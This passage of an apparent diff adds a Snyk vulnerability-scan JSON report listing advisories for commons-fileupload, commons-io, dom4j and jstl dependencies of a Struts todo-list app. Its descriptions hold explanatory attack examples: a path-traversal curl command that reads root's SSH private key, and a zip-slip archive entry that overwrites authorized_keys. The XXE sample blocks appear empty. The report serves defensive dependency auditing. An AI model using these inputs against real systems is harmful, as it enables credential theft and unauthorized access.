"commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.791816Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "title": "Information Exposure", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUploadBase$FileItemIteratorImpl.java", + "className": "FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUploadBase.java", + "className": "FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUpload.java", + "className": "FileUpload", + "functionName": "parseRequest" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L56", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814", + "title": "GitHub Commit" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:17.073322Z" + } + ], + "description": "## Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n## Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n## References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-200" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-10-01T08:05:48.497000Z", + "functions_new": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUpload", + "functionName": "parseRequest" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-02-17T22:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + 
"mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2017-02-17T08:05:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:03:17.073322Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Jakob Ackermann" + ], + "semver": { + "vulnerable": [ + "[1.0-beta-1, 1.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy", + "title": "Apache Mailing List" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e", + "title": "GitHub Commit (Tomcat)" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:52:57.097583Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:49.130585Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:57.097583Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this 
vulnerability.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n", + "epssDetails": { + "percentile": "0.91407", + "probability": "0.03359", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-24998" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2023-02-21T08:19:49.294883Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-02-21T08:00:22Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2023-02-21T09:23:34.093821Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.806365Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.1.2", + "commons-fileupload:commons-fileupload@1.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + 
"id": "SNYK-JAVA-COMMONSIO-1277109", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "credit": [ + "Lukas Euler" + ], + "semver": { + "vulnerable": [ + "[0, 2.7)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-io:commons-io", + "references": [ + { + "url": "https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/IO-556", + "title": "Jira Issue" + }, + { + "url": "https://github.com/AlAIAL90/CVE-2021-29425", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:37.151008Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "description": "## Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). 
In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n", + "epssDetails": { + "percentile": "0.54510", + "probability": "0.00171", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-29425" + ], + "CWE": [ + "CWE-20", + "CWE-22" + ], + "GHSA": [ + "GHSA-gwrp-pvrq-jmwv" + ] + }, + "packageName": "commons-io:commons-io", + "proprietary": false, + "creationTime": "2021-04-27T10:51:05.462338Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-04-26T16:04:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-io", + "artifactId": "commons-io" + }, + "publicationTime": "2021-04-27T14:26:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:56.345148Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-io:commons-io@2.2" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.0.0", + "commons-io:commons-io@2.9.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-io:commons-io", + "version": "2.2" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of 
Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, 
+ { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + 
"CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 